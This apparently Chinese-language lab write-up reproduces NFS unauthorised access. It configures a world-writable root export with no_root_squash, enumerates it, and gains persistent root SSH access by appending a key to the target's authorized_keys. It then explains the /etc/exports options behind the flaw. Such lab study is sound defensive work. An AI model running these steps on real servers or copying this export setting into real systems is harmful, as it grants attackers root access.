NFS未授权访问
复现漏洞
安装与配置
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
yum install nfs-utils.x86_64 -y
systemctl start (如果这个服务不启动,nfs服务会启动失败)
systemctl start nfs-server.service
systemctl enable rpcbind.service
systemctl enable nfs-server.service
vim /etc/exports
/ *(rw,sync,no_root_squash)
exportfs -r
showmount -e
mkdir /tmp/test
mount -t nfs 10.10.10.5:/ /tmp/test
ls /tmp/test/
|
漏洞利用
1
2
3
4
5
|
rpcinfo -p 10.10.10.5
showmount -e 10.10.10.5
|
配置SSH永久链接
1
2
3
4
5
6
7
8
| mkdir /tmp/security
mount -t nfs 10.10.10.5:/ /tmp/security/
ssh-keygen
cat /root/.ssh/id_rsa.pub >> /tmp/security/root/.ssh/authorized_keys
|
漏洞分析
总结:其实漏洞形成的原理就是权限不对,/etc/exports这个文件中的权限设置,我们上文采用的是root权限,所以导致服务器被入侵;
/etc/exports文件格式
<输出目录> [客户端1 选项(访问权限,用户映射,其他)] [客户端2 选项(访问权限,用户映射,其他)]
- 输出目录:输出目录是指NFS系统中需要共享给客户机使用的目录;
- 客户端:客户端是指网络中可以访问这个NFS输出目录的计算机
1
2
3
4
5
| 指定ip地址的主机:192.168.0.200
指定子网中的所有主机:192.168.0.0/24 192.168.0.0/255.255.255.0
指定域名的主机:david.bsmart.cn
指定域中的所有主机:*.bsmart.cn
所有主机:*
|
- 选项:选项用来设置输出目录的访问权限、用户映射等。
1
2
3
4
5
6
| all_squash:将远程访问的所有普通用户及所属组都映射为匿名用户或用户组(nfsnobody);
no_all_squash:与all_squash取反(默认设置);
root_squash:将root用户及所属组都映射为匿名用户或用户组(默认设置);
no_root_squash:与rootsquash取反;
anonuid=xxx:将远程访问的所有用户都映射为匿名用户,并指定该用户为本地用户(UID=xxx);
anongid=xxx:将远程访问的所有用户组都映射为匿名用户组账户,并指定该匿名用户组账户为本地用户组账户(GID=xxx);
|
1
2
3
4
5
6
7
8
| secure:限制客户端只能从小于1024的tcp/ip端口连接nfs服务器(默认设置);
insecure:允许客户端从大于1024的tcp/ip端口连接服务器;
sync:将数据同步写入内存缓冲区与磁盘中,效率低,但可以保证数据的一致性;
async:将数据先保存在内存缓冲区中,必要时才写入磁盘;
wdelay:检查是否有相关的写操作,如果有则将这些写操作一起执行,这样可以提高效率(默认设置);
no_wdelay:若有写操作则立即执行,应与sync配合使用;
subtree:若输出目录是一个子目录,则nfs服务器将检查其父目录的权限(默认设置);
no_subtree:即使输出目录是一个子目录,nfs服务器也不检查其父目录的权限,这样可以提高效率;
|
上一篇:CVE‐2020‐14882 weblogic未授权命令执行复现
下一篇:Ubuntu20.04搭建PTF渗透测试框架
